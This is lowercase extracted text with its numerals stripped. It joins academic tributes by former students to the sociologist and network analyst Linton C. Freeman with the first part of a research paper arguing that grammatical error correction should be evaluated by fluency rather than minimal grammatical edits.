structural theory of action. chapter contained a succinct yet detailed history of various constructs in the field of social networks. chapter emphasized the importance of perceptions of networks. light bulbs went off as i read it. page af- ter page, i could see these ideas could be very useful in the field of organizational behavior. indeed, i came to see that almost everything we study in ob could be looked at anew through this network lens. more- over, there were questions that we had never even thought about asking that could be researched from this network perspective, questions that would give connections (insna) us new insights into the organizational phenomena that we care about in our overtly psychological field. i abandoned my old dissertation plans and developed a new proposal to study the effect of employee turn- over on attitude change in fast food restaurants as a function of the network structure in the restaurant. i’ve been doing social network studies in organiza- tions ever since. all because i pushed the wrong but- ton on the elevator. it has been nearly years, but i recall vividly many of the details in this story, especially lin’s words and that “magical twinkle” in his eye when he handed me ron’s book. did he know that this book would have such an effect on me and my career plans? i don’t know. what i do know is that he never stopped engaging me, inspiring me, comforting me in rocky times over the years. i will miss him, his challenges to my way of thinking, his support, his friendship. intellectual lineage: a grandson and a son reminisce john skvoretz and tom fararo a remembrance of linton clarke freeman in which, first, the grandson, john skvoretz, narrates how he came to be lin’s intellectual grandson and then the son, tom fararo, reminisces more expan- sively about lin’s deep influence on his life and career. the first time i met lin turned out to be extremely consequential for me, resulting in my becoming his intellectual grandson. i was a senior at lehigh uni- versity double majoring in mathematics and sociol- ogy. at the time the two disciplines were but vaguely linked in my mind. i liked math because its problems had answers in the back of the book and i like sociol- ogy because its problems had no answers anywhere in the book. that the two could be put together in something called mathematical sociology was as yet unknown to me. the occasion of lin’s visit was a colloquium. i think he was invited by james mcintosh, a former colleague at syracuse, and it may have been the ini- tial overture to his recruitment as chair of the lehigh department of social relations. in any event the talk he gave had as its theme how mathematics could be used to improve concepts and theories in sociology. the example i remember most vividly was based on residential segregation. lin proposed a method of measuring residential segregation that compared the observed boundary around a set of minority house- holds to the length of the boundary that would oc- cur by chance, that is by the random scattering of m minority households and m majority households over a stylized housing grid. the mathematics came in to calculate the expected length of the boundary and variation in that quantity due to chance. as i re- call what struck me the most was lin’s point that this approach not only served to measure segregation as commonly understood – when the observed bound- ary was significantly smaller than expected – but also its polar opposite, regimented integration, when the boundary was significantly larger than expected. so with a fired-up imagination i hung around af- ter the talk and spoke with lin, telling him about my background and my interests. he advised me to check out a young professor, tom fararo, at the uni- versity of pittsburgh to see about working with him for my graduate education. at the time i did not re- alize that lin was tom’s dissertation supervisor. so a friend and i took a day off and hitchhiked across pennsylvania on the pa turnpike, he to visit the phys- ics department at pitt and me to visit tom. well, long story short, i enrolled at pitt in and finished a dissertation under tom’s supervision seven years lat- er. and that is how in i became one of lin free- man’s intellectual grandchildren. and now the son, tom fararo, shares his memo- ries. i first met lin in . he was , an assistant professor in the department of sociology at syra- cuse university. i was , a graduate student at syra- cuse in a program leading to a degree called doctor of social science. unlike lin and john, i had not been an undergrad- uate major in sociology but in history and political sci- ence, with no background at all in research methods and statistics. nevertheless, looking for income in the upcoming summer of , i applied to be an assistant on a research project dealing with community power structure, a lively topic in both political science and soci- ology at that time. i was hired by lin – after a very pleas- ant interview – and worked closely with him not only that summer but for a number of years beyond that. a collection of tributes to linton c. freeman working with lin was a transformative experience. i had brought to the project an interest in the history and philosophy of science but now i was doing sci- ence. by mid-summer, lin made me an offer: switch to the sociology graduate program and continue to work with him as a research assistant. it was an easy decision to make and one that shaped the remainder of my academic life. in the following academic years - , lin taught a number of courses i attended. as a teach- er, he was a model of logical organization and clarity. about that time, he began work toward his book el- ementary applied statistics: for students in behav- ioral science. i believe i read and commented on a draft and years later, when i stepped in to replace the usual teacher of statistics at pitt, i adopted lin’s text. it was the only time i ever taught statistics during my career. it was a very gratifying experience both for me and for the students, thanks to the sophisticated and lucid way that lin presented the material. following his advice, i looked beyond the depart- ment of sociology for further research-relevant course work, in particular taking courses in the psychology department, including social psychology and some quantitative courses, in particular factor analysis be- cause lin had figured out a way for us to use it in the data analysis phase of the project. i also attended lin’s course on the use of computers in social sci- ence research. he and i spent many hours at the uni- versity computer center watching the flashing lights on an ibm , a bulky early desktop computer. eventually, as we concluded the data analysis, lin asked me to write a first draft of a paper to be sub- mitted to the american sociological review. it was quite an honor! i gave it my best and waited for his reaction. ouch! what happened to my draft? he had produced a completely new paper in his distinctive crisp style that covered all that was needed to receive strong referee reviews that led to publication in asr in , “locating leaders in local communities: a comparison of some alternative approaches.” nat- urally i was very pleased when he included me as a co-author, but all the credit goes to lin when i men- tion that the paper was quickly reprinted in at least seven compilations of papers in political sociology. the last that i know of appeared in . eventually i had to define and pursue a doctoral thesis project. there was an opportunity to draw upon the community power structure data and so to deal with a problem we had faced at the data analysis phase. namely, a great deal of our data was simi- lar to sociometric data and yet more complex. much of the analysis was done using factor analysis, later described in lin’s monograph patterns of local community leadership. at about that time, in late , anatol rapoport and william horvath published their pioneering paper “a study of a large sociogram” in behavioral sci- ence. in his book, the development of social network analysis: a study in the sociology of sci- ence, lin includes a short discussion of the syracuse project, nicely summarizing how it emerged (pp. - ). i think he is correct when he writes there that he “leaned on” me to use the rapoport model in my dissertation research. accordingly, during the summer of , after studying rapoport’s papers in the bulletin of mathe- matical biophysics, i wrote to him about my disserta- tion project (i can’t recall if i consulted lin before do- ing so, but it is likely that i did). rapoport shared with me some of his recent work, including a revision of the biased net model that he and horvath had con- structed in their study. the term “net” was used in the bulletin papers and “bias” referred to parameters that were proposed to explain departures from a random net model. the syracuse interviews had generated an enor- mous amount of relational data, but it was organized around participation in community decisions. my dissertation, therefore, had to be a compromise: i would apply a biased net model to the largest of these decision sociograms even though they were nowhere near as large as the sociogram analyzed by rapoport and horvath. nevertheless, rapoport encouraged me to go forward with the project, as did lin. when i presented lin with what i thought would be the first draft of the thesis, i expected to get back a manuscript with his critical remarks and questions throughout. i even wondered if he might suggest a complete revision. a week later, i was standing before him as he sat at his desk when he returned the man- uscript to me. i looked through it: no markings at all. “that’s it?” i recall asking with some trepidation as to what this meant. he gave me that big grin i remem- ber so well and chuckled. “defend it,” he said, enjoy- ing my own overwhelmed surprise. and i did. there is an acknowledgment statement in the preface to my dissertation that reads: “anatol rapoport provided me with the revised theory of biased nets before its publication. more than that, he encouraged me to proceed with this study and provided invaluable advice. indeed, in the ab- sence of personal correspondence with anatol rap- oport, this whole study would have collapsed. i owe him an intellectual debt of great magnitude, not only because of the theory and the correspondence, but connections (insna) because through his writings i caught a glimpse of what rapoport once called ‘disciplined imagination.’’’ but i didn’t forget the formative role that lin played. in that preface i also thanked lin for his “personal reinforcement, support, and teaching […]. it was he who taught me that if i were really in- terested in theory, then i had better get interested in mathematics. more than making it plausible, he made it possible by setting an example and by encouraging me to go forward with this particular research effort.” in , i wrote in the preface to my book mathe- matical sociology: “it is a pleasure to acknowledge the influence of linton freeman in shaping my sociological incli- nations. as my mentor during my graduate student days, he was an important source of my commitment to exact methods in social theory. my ideas about mathematical social science were formed and trans- formed under diverse influences. to name but a few [….] [here i mentioned rapoport, as well as philoso- phers patrick suppes and stephen toulmin, among others including sociologists jim coleman and har- rison white].” however, i made an error of judgment in not ask- ing lin to read a draft of that book. in retrospect, i think he would have suggested that i omit cer- tain materials not only to shorten the book but also to make space for the coverage of the rapoport- horvath model and my own later follow-up publica- tion (mentioned below). this is a negative instance of my theme: not drawing upon my connection to lin led to a less positive outcome than would have oc- curred with his advice. by the way, the insightful and influential paper by granovetter (“the strength of weak ties”) appeared in ajs that year ( ) but too late for me to know about when my book went to press. it also drew upon the rapoport-horvath paper. lin also created numerous intellectual opportunities for me during my graduate student days at syracuse. in the early years, all my support came from fellowships and research activity. then lin suggested that i do some teaching and spoke with the chairperson about it. despite his relatively junior rank, on this occasion and many others it was apparent to me that lin had considerable influence within the department. he was able to persuade the department’s senior members, including the chairperson, that i should be assigned certain specific courses of my own even though i had not even had any experience as a teaching assistant. thus, my earliest teaching focused on theory: an undergraduate course in sociological theory and an- other course for sociology majors called “the integra- tion seminar.” in the theory course, one of the texts i had students read was games, fights and debates by anatol rapoport and in the integration seminar one of the texts was the newly published types of formalization by joe berger and co-authors. both books were indicative of new developments in social science centering on formal models. lin was among the sociologists who recognized the importance of this frontier work in the social sciences. i recall that in one of lin’s courses he lec- tured on elementary set theory, finite probability the- ory and elementary matrix algebra. these mathemat- ical ideas were the key ingredients that were pulled together by john kemeny in his innovative textbooks with co-author laurie snell, starting with an introduc- tion to finite mathematics, which i believe was first published in . lin also drew upon his professional acquaintance network to open up career opportunities for me, in- cluding getting invitations to give talks, applying for and receiving funding for research, and another important act on his part, writing a strong recommendation re- garding my application for a post-doctoral fellowship. i’ll try to recall a little of each of these efforts on his part that helped to shape my career in sociology. i think it was late in that jim coleman invit- ed me to give a seminar on my dissertation work. he was at johns hopkins at the time and interested in rapoport’s work. indeed, he had written an exten- sive essay on it that appeared in in mathemat- ical thinking in the measurement of behavior (edited by herbert solomon). this little-cited essay should be recognized as part of the history of social network analysis. there was a similar invitation from peter rossi to talk about my thesis work at the university of chicago. at about the same time, i received an offer to re- main at syracuse as an assistant professor starting in the academic year - . perhaps this was an- other example of lin’s behind-the-scenes influence. however, i surmise that he must have been ambiva- lent about it. i know he suggested that i wait to take the best offer, which would be from johns hopkins or chicago, should either or both actually make an of- fer. however, the syracuse chairperson pressed me to decide while coleman and rossi both indicated that it was too early for them to decide among can- didates. thus, i accepted the position at syracuse. maybe i should add that i had a wife and two very young children so that prospective financial security was a factor in the decision. once it was clear that i would be a syracuse fac- ulty member in the academic year - , i began to think about getting support for a research project i had in mind. my prospective collaborator (morris a collection of tributes to linton c. freeman sunshine) and i applied for support for a study that would relate to the theory of differential association that was often cited at that time in regard to the ex- planation of juvenile delinquency. we planned to do a sociometric study of an entire local junior high school student population. lin was instrumental in speaking on our behalf to the director of the syracuse univer- sity youth development center. i think we each re- ceived an appointment as research associate at the center as well as support for conducting the study. from my point of view, the center’s support ena- bled a study of a large network and so a better fol- low-up to the rapoport-horvath paper than my disser- tation had been. at its conclusion, our research project led to a monograph on random and biased net theory and the empirical testing of a biased net model. a link to differential association theory also was included. sunshine and i called it a study of a biased friend- ship net. in the course of the formal work, i found a problem in rapoport’s most recent “tracing formula” that led me to devise and use a new formula. ironically, years later, john skvoretz found a problem in my for- mula, leading him to a series of formal and computa- tional studies in the theory of random and biased nets. gradually, amidst this teaching and research, i realized that the direction my academic activity was taking would require more than finite mathematics. i applied for a three-year post-doctoral fellowship for studies in pure mathematics and mathematical mod- els in the social sciences at stanford university. there is no doubt in my mind that lin’s recommendation strongly contributed to my getting the fellowship. thus, there was a match between what i wanted to do and what funding agencies were ready to support during that era. and what i wanted to do was at least in part the outcome of my extended interaction with lin since i first met him in . toward the end of that three-year period at stan- ford, i think lin was ready to leave syracuse. we had remained in contact and he had stopped by to visit my wife and i in palo alto at least once. his proposal was that we form a research group at the university of pittsburgh that would engage in teach- ing and research on the new intellectual frontier. this idea probably was sparked by an opportunity that existed at pitt at that time. namely, funds were made available by the university administration for departments that had a “vision” for what they could become in terms of stature. the sociology depart- ment chairperson at the time, burkart holzner, came up with a vision that was quite ambitious, involving hiring three research groups, each on the frontier of new developments in the field. i only recall two of these: historical sociology and what he called formal sociology. although not a formalist in his own work, holzner had taken note of the new developments that i mentioned earlier. thus, in , lin and i both joined the department, as did otomar bartos, who had just published a very nice textbook called sim- ple models of group behavior (one chapter deals with a dominance model, right out of the bulletin of mathematical biophysics). i wish i could say it all worked out beautifully. but it didn’t. maybe it was the late s turmoil. i don’t know. bartos left very soon. and lin spent only two years at pitt before moving on in , the same year that john skvoretz arrived to join the graduate pro- gram – through lin’s influence. i remained at pitt for my entire career and john would eventually become my frequent collaborator. farewell to lin freeman, my mentor and more! social scientist extraordinaire! reassessing the goals of grammatical error correction: fluency instead of grammaticality keisuke sakaguchi , courtney napoles , matt post , and joel tetreault center for language and speech processing, johns hopkins university human language technology center of excellence, johns hopkins university yahoo {keisuke,napoles,post}@cs.jhu.edu, tetreaul@yahoo-inc.com abstract the field of grammatical error correction (gec) has grown substantially in recent years, with research directed at both evaluation met- rics and improved system performance against those metrics. one unvisited assumption, however, is the reliance of gec evaluation on error-coded corpora, which contain spe- cific labeled corrections. we examine cur- rent practices and show that gec’s reliance on such corpora unnaturally constrains annota- tion and automatic evaluation, resulting in (a) sentences that do not sound acceptable to na- tive speakers and (b) system rankings that do not correlate with human judgments. in light of this, we propose an alternate approach that jettisons costly error coding in favor of unan- notated, whole-sentence rewrites. we com- pare the performance of existing metrics over different gold-standard annotations, and show that automatic evaluation with our new anno- tation scheme has very strong correlation with expert rankings (ρ = . ). as a result, we ad- vocate for a fundamental and necessary shift in the goal of gec, from correcting small, la- beled error types, to producing text that has native fluency. introduction what is the purpose of grammatical error correction (gec)? one response is that gec aims to help peo- ple become better writers by correcting grammatical mistakes in their writing. in the nlp community, the original scope of gec was correcting targeted error types with the goal of providing feedback to non-native writers (chodorow and leacock, ; dale and kilgarriff, ; leacock et al., ). as systems improved and more advanced methods were applied to the task, the definition evolved to whole- sentence correction, or correcting all errors of every error type (ng et al., ). with this pivot, we urge the community to revisit the original question. it is often the case that writing exhibits problems that are difficult to ascribe to specific grammatical categories. consider the following example: original: from this scope , social media has shorten our distance . corrected: from this scope , social media has shortened our distance . if the goal is to correct verb errors, the grammat- ical mistake in the original sentence has been ad- dressed and we can move on. however, when we aim to correct the sentence as a whole, a more vex- ing problem remains. the more prominent error has to do with how unnaturally this sentence reads. the meanings of words and phrases like scope and the corrected shortened our distance are clear, but this is not how a native english speaker would use them. a more fluent version of this sentence would be the following: fluent: from this perspective , social media has shortened the distance between us . this issue argues for a broader definition of gram- maticality that we will term native-language flu- ency, or simply fluency. one can argue that tradi- tional understanding of grammar and grammar cor- rection encompasses the idea of native-language flu- ency. however, the metrics commonly used in eval- uating gec undermine these arguments. the per- formance of gec systems is typically evaluated us- transactions of the association for computational linguistics, vol. , pp. – , . action editor: chris quirk. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. ing metrics that compute corrections against error- coded corpora, which impose a taxonomy of types of grammatical errors. assigning these codes can be difficult, as evidenced by the low agreement found between annotators of these corpora. it is also quite expensive. but most importantly, as we will show in this paper, annotating for explicit error codes places a downward pressure on annotators to find and fix concrete, easily-identifiable grammatical er- rors (such as wrong verb tense) in lieu of addressing the native fluency of the text. a related problem is the presence of multiple evaluation metrics computed over error-annotated corpora. recent work has shown that metrics like m and i-measure, both of which require error- coded corpora, produce dramatically different re- sults when used to score system output and produce a ranking of systems in conventional competitions (felice and briscoe, ). in light of all of this, we suggest that the gec task has overlooked a fundamental question: what are the best practices for corpus annotation and system evaluation? this work attempts to answer this ques- tion. we show that native speakers prefer text that exhibits fluent sentences over ones that have only minimal grammatical corrections. we explore dif- ferent methods for corpus annotation (with and with- out error codes, written by experts and non-experts) and different evaluation metrics to determine which configuration of annotated corpus and metric has the strongest correlation with the human ranking. in so doing, we establish a reliable and replicable evalu- ation procedure to help further the advancement of gec methods. to date, this is the only work to un- dertake a comprehensive empirical study of annota- tion and evaluation. as we will show, the two areas are intimately related. fundamentally, this work reframes grammati- cal error correction as a fluency task. our pro- posed evaluation framework produces system rank- ings with strong to very strong correlations with hu- man judgments (spearman’s ρ = . , pearson’s r = . ), using a variation of the gleu metric (napoles et al., ) and two sets of “fluent” sen- all the scripts and new data we collected are available at https://github.com/keisks/reassess-gec. this metric should not be confused with the method of the same name presented in mutton et al. ( ) for sentence-level tence rewrites as a gold standard, which are simpler and cheaper to collect than previous annotations. current issues in gec in this section, we will address issues of the gec task, reviewing previous work with respect to error annotation and evaluation metrics. . annotation methodologies existing corpora for gec are annotated for er- rors using fine-grained coding schemes. to create error-coded corpora, trained annotators must iden- tify spans of text containing an error, assign codes corresponding to the error type, and provide correc- tions to those spans for each error in the sentence. one of the main issues with coded annotation schemes is the difficulty of defining the granularity of error types. these sets of error tags are not easily interchangeable between different corpora. specif- ically, two major gec corpora have different tax- onomies: the cambridge learner corpus (clc) (nicholls, ) has tags, which generally repre- sent the word class of the error and the type of error (such as replace preposition, unnecessary pronoun, or missing determiner). in contrast, the nus cor- pus of learner english (nucle) (dahlmeier et al., ) has only error types. a direct conversion between them, if possible, would be very complex. additionally, it is difficult for annotators to agree on error annotations, which complicates the annotation validity as a gold standard (leacock et al., ). this is due to the nature of grammatical error cor- rection, where there can be diverse correct edits for a sentence (figure ). in other words, there is no single gold-standard correction. the variety of error types and potential correct edits result in very low inter-annotator agreement (iaa), as reported in pre- vious studies (tetreault and chodorow, ; ro- zovskaya and roth, ; bryant and ng, ). this leads to a more fundamental question: why do we depend so much on fine-grained, low- consensus error-type annotations as a gold standard for evaluating gec systems? one answer is that error tags can be informative and useful to provide feedback to language learn- ers, especially for specific closed-class error types fluency evaluation. https://github.com/keisks/reassess-gec as the development of the technology , social media becomes more and more significant role in the whole world . with the development of technology as the technology develops as technology develops plays a more and more significant role becomes more and more significant world figure : an ungrammatical sentence that can be corrected in different ways. (such as determiners and prepositions). indeed, the clc, the first large-scale corpus of annotated gram- matical errors, was coded specifically with the intent of gathering statistics about errors to inform the de- velopment of tools to help english language learn- ers (nicholls, ). later gec corpora adhered to the same error-coding template, if not the same error types (rozovskaya and roth, ; yannakoudakis et al., ; dahlmeier et al., ). the first shared task in gec aspired to the clc’s same objective: to develop tools for language learn- ers (dale and kilgarriff, ). subsequent shared tasks (dale et al., ; ng et al., ) followed suit, targeting specific error types. error-coded corpora are effective training and evaluation data for targeted error correction, and statistical classi- fiers have been developed to handle errors involving closed-class words (rozovskaya and roth, ). however, the conll shared task engendered a sea change in gec: in this shared task, systems needed to correct all errors in a sentence, of all er- ror types, including ones more stylistic in nature (ng et al., ). the evaluation metrics and annotated data from the previous shared task were used; how- ever we argue that they do not align with the use case of this reframed task. what is the use case of whole-sentence correction? it should not be to pro- vide specific targeted feedback on error types, but rather to rewrite sentences as a proofreader would. the community has already begun to view whole- sentence correction as a task, with the yet unstated goal of improving the overall fluency of sentences. independent papers published human evaluations of the shared task system output (napoles et al., ; grundkiewicz et al., ), asking judges to rank systems based on their grammaticality. as gec moves toward correcting an entire sentence instead of targeted error types, the myriad acceptable edits will result in much lower iaa, compromising eval- uation metrics based on the precision and recall of coded errors. at this juncture, it is crucial that we examine whether error-coded corpora and evalua- tion are necessary for this new direction of gec. finally, it would be remiss not to address the cost and time of corpus annotation. tetreault and chodorow ( ) noted that it would take hours to correct , preposition errors by one trained annotator. bryant and ng ( ) reported that it took about three weeks ( hours) to collect independent annotations for , sentences, with all conll- error types annotated. clearly, constructing a corpus with fine-grained error an- notations is a labor-intensive process. due to the time and cost of annotation, the corpora currently used in the community are few and tend to be small, hampering robust evaluations as well as lim- iting the power of statistical models for generat- ing corrections. if an effective method could be devised to decrease time or cost, larger corpora— and more of them—could be created. there has been some work exploring this, namely tetreault and chodorow ( ), which used a sampling ap- proach that would only work for errors involving closed-class words. pavlick et al. ( ) also de- scribe preliminary work into designing an improved crowdsourcing interface to expedite data collection of coded errors. section outlines our annotation approach, which is faster and cheaper than previous approaches be- cause it does not make use of error coding. . evaluation practices three evaluation metrics have been proposed for gec: maxmatch (m ) (dahlmeier and ng, ), i-measure (felice and briscoe, ), and gleu (napoles et al., ). the first two compare the changes made in the output to error-coded spans of the reference corrections. m was the metric used not including the metrics of the hoo shared tasks, which were precision, recall, and f-score. for the and conll gec shared tasks (ng et al., ; ng et al., ). it captures word- and phrase-level edits by building an edit lattice and calculating an f-score over the lattice. felice and briscoe ( ) note problems with m : specifically, it does not distinguish between a “do-nothing baseline” and systems that only pro- pose wrong corrections; also, phrase-level edits can be easily gamed because the lattice treats the dele- tion of a long phrase as a single edit. to address these issues, they propose i-measure, which gener- ates a token-level alignment between the source sen- tence, system output, and gold-standard sentences, and then computes accuracy based on the alignment. unlike these approaches, gleu does not use error-coded references (napoles et al., ). based on bleu (papineni et al., ), it computes n-gram precision of the system output against refer- ence sentences. gleu additionally penalizes text in the output that was unchanged from the source but changed in the reference sentences. recent work by napoles et al. ( ) and grund- kiewicz et al. ( ) evaluated these metrics against human evaluations obtained using methods bor- rowed from the workshop on statistical machine translation (bojar et al., ). both papers found a moderate to strong correlation with human judg- ments for gleu and m , and a slightly negative cor- relation for i-measure. importantly, however, none of these metrics achieved as a high correlation with the human oracle ranking as desired in a fully reli- able metric. in section , we examine the available metrics over different types of reference sets to identify an evaluation setup nearly as reliable as human experts. creating a new, fluent gec corpus we hypothesize that human judges, when presented with two versions of a sentence, will favor fluent ver- sions over ones that exhibit only technical grammat- icality. by technical grammaticality, we mean adherence to an accepted set of grammatical conventions. in contrast, we consider a text to be fluent when it we use the term references to refer to the corrected sen- tences, since the term gold standard suggests that there is just one right correction. looks and sounds natural to a native-speaking pop- ulation. both of these terms are hard to define pre- cisely, and fluency especially is a nuanced concept for which there is no checklist of criteria to be met. to carry the intuitions, table contains examples of sentences that are one, both, or neither. a text does not have to be technically grammatical to be consid- ered fluent, although in almost all cases, fluent texts are also technically grammatical. in the rest of this paper, we will demonstrate how they are quantifiably different with respect to gec. annotating coded errors encourages a minimal set of edits because more substantial edits often address overlapping and interacting errors. for example, the annotators of the nucle corpus, which was used for the recent shared tasks, were explicitly instructed to select the minimal text span of possible alterna- tives (dahlmeier et al., ). there are situations where error-coded annotations are useful to help stu- dents correct specific grammatical errors. the abil- ity to do this with the non-error-coded, fluent an- notations we advocate here is no longer direct, but is not lost entirely. for this purpose, some recent studies have proposed post hoc automated error- type classification methods (swanson and yamangil, ; xue and hwa, ), which compare the orig- inal sentence to its correction and deduce the error types. we speculate that, by removing the error-coding restraint, we can obtain edits that sound more fluent to native speakers while also reducing the expense of annotation, with diminished time and training re- quirements. chodorow et al. ( ) and tetreault et al. ( ) suggested that it is better to have a large number of annotators to reduce bias in automatic evaluation. following this recommendation, we col- lected additional annotations without error codes, written by both experts and non-experts. it is important to note that both grammaticality and fluency are determined with respect to a particular speaker population and setting. in this paper, we focus on standard written en- glish, which is the standard used in education, business, and journalism. while judgments of individual sentences would differ for other populations and settings (for example, spoken african-american vernacular english), the distinction between grammaticality and fluency would remain. technically grammatical not technically grammatical fluent in addition, it is impractical to make such a law. i don’t like this book, it’s really boring. not fluent firstly , someone having any kind of disease be- longs to his or her privacy . it is unfair to release a law only point to the ge- netic disorder. table : examples and counterexamples of technically grammatical and fluent sentences. original genetic disorder may or may not be hirataged hereditary disease and it is sometimes hard to find out one has these kinds of diseases . expert fluency a genetic disorder may or may not be e a hereditary disease , and it is sometimes hard to find out whether one has these kinds of diseases . non-expert fluency genetic e factors can manifest overtly as disease e , or simply be carried , making it e hard , sometimes , to find out if one has e a genetic predisposition to disease . table : an example sentence with expert and non-expert fluency edits. moved and changed or inserted spans are underlined and e indicates deletions. . data collection we collected a large set of additional human correc- tions to the nucle . test set, which was used in the conll shared task on gec (ng et al., ) and contains , sentences error-coded by two trained annotators. bryant and ng ( ) col- lected an additional eight annotations using the same error-coding framework, referred to here as bn . we collected annotations from both experts and non-experts. the experts were three native en- glish speakers familiar with the task. to ensure that the edits were clean and meaning-preserving, each expert’s corrections were inspected by a dif- ferent expert in a second pass. for non-experts, we used crowdsourcing, which has shown potential for annotating closed-class errors as effectively as ex- perts (tetreault et al., ; madnani et al., ; tetreault et al., ). we hired participants on amazon mechanical turk (mturk) who had a hit approval rate of at least % and were located in the united states. the non-experts went through an additional screening process: before completing the task, they wrote corrections for five sample sen- tences, which were checked by the three experts. www.comp.nus.edu.sg/˜nlp/conll st.html all of the expert annotators are authors of this work. the experts verified that the participants were following the instructions and not gaming the hits. we collected four complete sets of annotations by both types of annotators: two sets of minimal edits, designed to make the original sentences technically grammatical (following the nucle annotation in- structions but without error coding), and two sets of fluency edits, designed to elicit native-sounding, flu- ent text. the instructions were: • minimal edits: make the smallest number of changes so that each sentence is grammatical. • fluency edits: make whatever changes neces- sary for sentences to appear as if they had been written by a native speaker. in total, we collected ( × × ) annotations from each original sentence (minimal and fluency, expert and non-expert, two corrections each). of the original , sentences, the experts flagged sentences that needed to be merged together, so we skipped these sentences in our analysis and experi- ments. in the next two subsections we compare the changes made under both the fluency and minimal edit conditions (section . ) and show how humans rate corrections made by experts and non experts in both settings (section . ). . edit analysis when people (both experts and non-experts) are asked to make minimal edits, they make few changes www.comp.nus.edu.sg/~nlp/conll st.html original some family may feel hurt , with regards to their family pride or reputation , on having the knowl- edge of such genetic disorder running in their family . nucle some family members may feel hurt e with regards to their family pride or reputation e on having the knowledge of a genetic disorder running in their family . expert fluency on e learning of such a genetic disorder running in their family , some family members may feel hurt e regarding their family pride or reputation . non-expert fluency some relatives may e be concerned about the family ’s e reputation – not to mention their own pride – in relation to this news of e familial genetic defectiveness e . expert minimal some families may feel hurt e with regards to their family pride or reputation , on having e knowledge of such a genetic disorder running in their family . non-expert minimal some family may feel hurt e with regards to their family pride or reputation e on having the knowledge of such genetic disorder running in their family . table : an example sentence with the original nucle correction and fluency and minimal edits written by experts and non-experts. moved and changed or inserted spans are underlined and e indicates deletions. to the sentences and also change fewer of the sen- tences. fluency edits show the opposite effect, with non-experts taking more liberties than experts with both the number of sentences changed and the de- gree of change within each sentence (see table for an extreme example of this phenomenon). in order to quantify the extent of changes made in the different annotations, we look at the percent of sentences that were left unchanged as well as the number of changes needed to transform the original sentence into the corrected annotation. to calculate the number of changes, we used a modified trans- lation edit rate (ter), which measures the number of edits needed to transform one sentence into an- other (snover et al., ). an edit can be an inser- tion, deletion, substitution, or shift. we chose this metric because it counts the movement of a phrase (a shift) as one change, which the levenshtein dis- tance would heavily penalize. ter is calculated as the number of changes per token, but instead we re- port the number of changes per sentence for ease of interpretation, which we call the ster. we compare the original set of sentences to the new annotations and the existing nucle and bn reference sets to determine the relative extent of changes made by the fluency and minimal edits (fig- ure ). compared to the original, non-experts had a higher average ster than experts, meaning that they made more changes per sentence. for fluency ed- its, experts and non-experts changed approximately the same number of sentences, but the non-experts made about seven edits per sentence compared to the experts’ four. minimal edits by both experts and non-experts exhibit a similar degree of change from the original sentences, so further qualitative assess- ment is necessary to understand whether the annota- tors differ. table contains an example of how the same ungrammatical sentence was corrected using both minimal and fluency edits, as well as one of the original nucle corrections. the error-coded annotations of nucle and bn fall somewhere in between the fluency and minimal edits in terms of ster. the most conser- vative set of sentences is the system output of the conll shared task, with ster = . , or ap- proximately one change made per sentence. in con- trast, the most conservative human annotations, the minimal edits, edited a similar percent of the sen- tences but made about two changes per sentence. when there are multiple annotators working on the same data, one natural question is the inter- annotator agreement (iaa). for gec, iaa is of- ten low and arguably not an appropriate measure of agreement (bryant and ng, ). additionally, it would be difficult, if possible, to reliably calculate iaa without coded alignments between the new and nucle bn e-minimal n-minimal e-fluency n-fluency output % % % % % % percent of sentences changed nucle bn e-minimal n-minimal e-fluency n-fluency output mean ster insertions deletions substitutions phrases shifted figure : amount of changes made by different annota- tion sets compared to the original sentences. original sentences. therefore, we look at two al- ternate measures: the percent of sentences to which different annotators made the same correction(s) and the ster between two annotators’ corrections, re- ported in table . as we expect, there is notably lower agreement between the annotators for fluency edits than for minimal edits, due to the presumably smaller set of required versus optional stylistic changes. expert annotators produced the same correction on % of the fluency edits, but more than % of their min- imal edits were identical. half of these identical sentences were unchanged from the original. there was lower agreement between non-expert annotators than experts on both types of edits. we performed the same calculations between the two nucle an- notators and found that they had agreement rates similar to the non-expert minimal edits. however, the experts’ minimal edits have much higher con- sensus than both the non-experts’ and nucle, with twice as many identical corrected sentences and half the ster. from this analysis, one could infer that the expert annotations are more reliable than the non-expert be- cause there are fewer differences between annotators edit type annotator identical ster fluency e v. e . % . n v. n . % . e v. n . % . minimal e v. e . % . n v. n . % . e v. n . % . nucle a v. b. . % . table : a comparison of annotations across different annotators (e for expert, n for non-expert). where there were more than two annotators, statistics are over the full pairwise set. identical refers to the percentage of sen- tences where both annotators made the same correction and ster is the mean ster between the annotators’ cor- rections. and fewer changes per sentence. . human evaluation as an additional validation, we ran a task to establish the relative quality of the new fluency and minimal- edit annotations using crowdsourcing via mturk. participants needed to be in the united states with a hit approval rate of at least % and pass a pre- liminary ranking task, graded by the authors. we randomly selected sentences and asked partici- pants to rank the new annotations, one randomly se- lected nucle correction, and the original sentence in order of grammaticality and meaning preservation (that is, a sentence that is well-formed but changes the meaning of the original source should have a lower rank than one that is equally well-formed but maintains the original meaning). since we were comparing the minimal edits to the fluency edits, we did not define the term grammaticality, but instead relied on the participants’ understanding of the term. each sentence was ranked by two different judges, for a total of rankings, yielding , pairwise comparisons. to rank systems, we use the trueskill approach (herbrich et al., ; sakaguchi et al., ), based on a protocol established by the workshop on ma- chine translation (bojar et al., ; bojar et al., ). for each competing system, trueskill infers the absolute system quality from the pairwise com- parisons, representing each as the mean of a gaus- sian. these means can then be sorted to rank sys- # score range annotation type . – expert fluency . – non-expert fluency . nucle . expert minimal - . non-expert minimal - . original sentence table : human ranking of the new annotations by gram- maticality. lines between systems indicate clusters ac- cording to bootstrap resampling at p ≤ . . systems in the same cluster are considered to be tied. tems. by running trueskill , times using boot- strap resampling and producing a system ranking each time, we collect a range of ranks for each sys- tem. we can then cluster systems according to non- overlapping rank ranges (koehn, ) to produce the final ranking, allowing ties. table shows the ranking of “grammatical” judg- ments for the additional annotations and the orig- inal nucle annotations. while the score of the expert fluency edits is higher than the non-expert fluency, they are within the same cluster, suggest- ing that the judges perceived them to be just as good. the fluency rewrites by both experts and non- experts are clearly preferable over the minimal edit corrections, although the error-coded nucle cor- rections are perceived as more grammatical than the minimal corrections. automatic metrics we have demonstrated that humans prefer fluency edits to error-coded and minimal-edit corrections, but it is unclear whether these annotations are an effective reference for automatic evaluation. the broad range of changes that can be made with non- minimal edits may make it especially challenging for current automatic evaluation metrics to use. in this section, we investigate the impact that differ- ent reference sets have on the system ranking found by different evaluation metrics. with reference sets having such different characteristics, the natural question is: which reference and evaluation metric pairing best reflects human judgments of grammati- cality? to answer this question, we performed a compre- hensive investigation of 